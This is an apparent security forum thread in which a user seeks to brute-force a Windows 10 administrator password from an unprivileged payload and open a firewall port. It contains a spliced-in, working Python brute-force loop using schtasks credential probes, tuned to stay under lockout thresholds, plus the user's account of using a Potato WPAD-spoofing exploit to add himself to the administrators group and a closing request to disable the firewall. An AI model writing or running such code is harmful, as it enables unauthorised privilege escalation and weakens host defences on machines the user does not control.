
Brute forcing an admin account from payload? Windows 10



So I wanted to make a payload which can be run without admin privileges and brute force the admin password by calling some program with system() that requires a password, until the password is found.

My question is: what is the fastest command you can run from the Windows command line that will actually require an administrator password?

Also how do I get an error message back for conditional logic that will tell me if I got the right password?

Any Ideas?


You'll be very limited in what apps you can use because you'll need to pick one that takes the password on the command line.

From that list, it shouldn't really matter what you pick, as the first thing the app should do is check permissions, so they will all fail at about the same speed.


Digininja, any chance you can help me with syntax on this?

I think I'm going to just go ahead and brute force a scheduled task that will open a port on the firewall.

I'm not sure of the syntax for schtasks and netsh advfirewall. Here's what I was trying for, but my syntax is horribly wrong. Not really sure on the options.

schtasks /Create /S %computername% /U %username% /P password /TN portopen /SC %time% /tr netsh advfirewall firewall add rule name="Open Port 9999" dir=in action=allow protocol=TCP localport=9999


Edited by vailixi

Or maybe something like this:
I keep getting syntax errors. I think I need escape characters, but I'm not really sure how to write out this command.

schtasks /Create /S %computername% /RU %username% /RP password /SC ONCE /TN portopen /TR "netsh advfirewall firewall add rule name=Open Port 9999 dir=in action=allow protocol=TCP localport=9999 /ST 18:44"


Edited by vailixi

Too complicated. Why not just do a dir, or even a command that doesn't exist? That means you don't have to pass loads of arguments to the command you are calling.

And as a way to catch the password, put it in the comment. Having said that, I'm not sure if you can see other people's tasks, so that might not be of any use. Just monitor the return code instead.

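The loop Digininja describes, as an added example that is not code from the thread: probe with `schtasks /Create /RU user /RP guess`, decide on the return code rather than on a task comment, and stop early when the error is "Access is denied" rather than a wrong password, since that is a rights problem and further guesses tell you nothing (it is also the error the original poster hits). Assumptions: Windows with schtasks.exe on PATH, the English-locale error strings, a hypothetical probe task name `pwcheck`, and a constructed wordlist; the `make_fake_runner` stand-in exists only so the loop runs offline, and on a real host you pass `run_command` instead. One caveat a practitioner would want: every wrong guess is a failed logon for that account, so it counts against any lockout threshold and shows up as Event ID 4625 in the Security log; `max_attempts` is there to stay under the threshold.

```python
import subprocess
from typing import Callable, Iterable, Optional, Sequence, Tuple

# A runner takes an argv list and returns (return_code, combined_output).
Runner = Callable[[Sequence[str]], Tuple[int, str]]

TASK_NAME = "pwcheck"  # hypothetical name for the throwaway probe task


def build_probe_cmd(user: str, password: str, task_name: str = TASK_NAME) -> list:
    """Build the schtasks /Create probe.

    The task body is a harmless `cmd /c dir`; what matters is that the Task
    Scheduler validates the /RU /RP credentials when the task is registered,
    so the exit status of this one command answers "was the password right?".
    """
    return [
        "schtasks", "/Create", "/F",
        "/RU", user, "/RP", password,
        "/SC", "ONCE", "/ST", "23:59",
        "/TN", task_name,
        "/TR", "cmd /c dir",
    ]


def classify(rc: int, output: str) -> str:
    """Map one probe result to success / bad_password / denied / other.

    The message strings are the English-locale schtasks errors; on a localised
    Windows the text differs and only the return code can be relied on.
    """
    if rc == 0:
        return "success"
    if "user name or password is incorrect" in output:
        return "bad_password"
    if "Access is denied" in output:
        return "denied"
    return "other"


def run_command(cmd: Sequence[str]) -> Tuple[int, str]:
    """Real runner: execute the command and return (rc, stdout+stderr)."""
    proc = subprocess.run(list(cmd), capture_output=True, text=True)
    return proc.returncode, proc.stdout + proc.stderr


def brute_force(user: str, candidates: Iterable[str], runner: Runner = run_command,
                max_attempts: Optional[int] = None, task_name: str = TASK_NAME) -> Optional[str]:
    """Try candidates until one registers the task; return it, or None.

    Each wrong guess is a failed logon against `user`, so keep max_attempts
    below the local or domain lockout threshold if one is set.
    """
    for n, pw in enumerate(candidates, start=1):
        if max_attempts is not None and n > max_attempts:
            break
        rc, out = runner(build_probe_cmd(user, pw, task_name))
        verdict = classify(rc, out)
        if verdict == "success":
            # Remove the probe task so nothing actually runs at 23:59.
            runner(["schtasks", "/Delete", "/F", "/TN", task_name])
            return pw
        if verdict == "denied":
            # Not a credential failure: the calling account may not register
            # tasks for that user at all, so further guesses tell us nothing.
            raise PermissionError(out.strip())
    return None


def make_fake_runner(correct_password: str) -> Runner:
    """Constructed stand-in for schtasks so the loop can be exercised offline."""
    def fake(cmd: Sequence[str]) -> Tuple[int, str]:
        if "/Delete" in cmd:
            return 0, 'SUCCESS: The scheduled task "%s" was successfully deleted.' % TASK_NAME
        pw = cmd[list(cmd).index("/RP") + 1]
        if pw == correct_password:
            return 0, 'SUCCESS: The scheduled task "%s" has successfully been created.' % TASK_NAME
        return 1, "ERROR: The user name or password is incorrect."
    return fake


if __name__ == "__main__":
    # Constructed wordlist; on a real host replace make_fake_runner(...) with run_command.
    wordlist = ["password", "Password1", "Winter2016!", "letmein"]
    print(brute_force("bob", wordlist, runner=make_fake_runner("Winter2016!")))
```

The runner is injected so the same loop can be pointed at a different credential-taking command later without touching the guessing logic; only `build_probe_cmd` and `classify` know anything about schtasks.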

OK, OK, that makes sense. LOL.

I tried this:

schtasks /Create /S %computername% /RU desktop/8alleale\me /RP password /SC ONCE /TN dirshow /TR dir /ST 13:30

Now I'm at least getting access denied instead of a syntax error.
I tried this as well:

schtasks /Create /S %computername% /RU %username% /RP password /SC ONCE /TN dirshow /TR dir /ST 13:30

Same this way, access denied. Is there something wrong with the way I'm getting the system and username?

Edited by vailixi

Incidentally, I found this WPAD spoofing attack that seems to work rather well.

Potato attack

Potato source code on Github

Syntax was something like this:

Potato.exe -ip -disable_exhaust true -cmd "C:\\windows\\system32\\cmd.exe /k net localgroup administrators me /add"

This actually worked for adding my user to the administrators group. That's cool and all. I still don't have the password to run netsh and open a port on the firewall, though.

Is there a way to just kill the firewall?
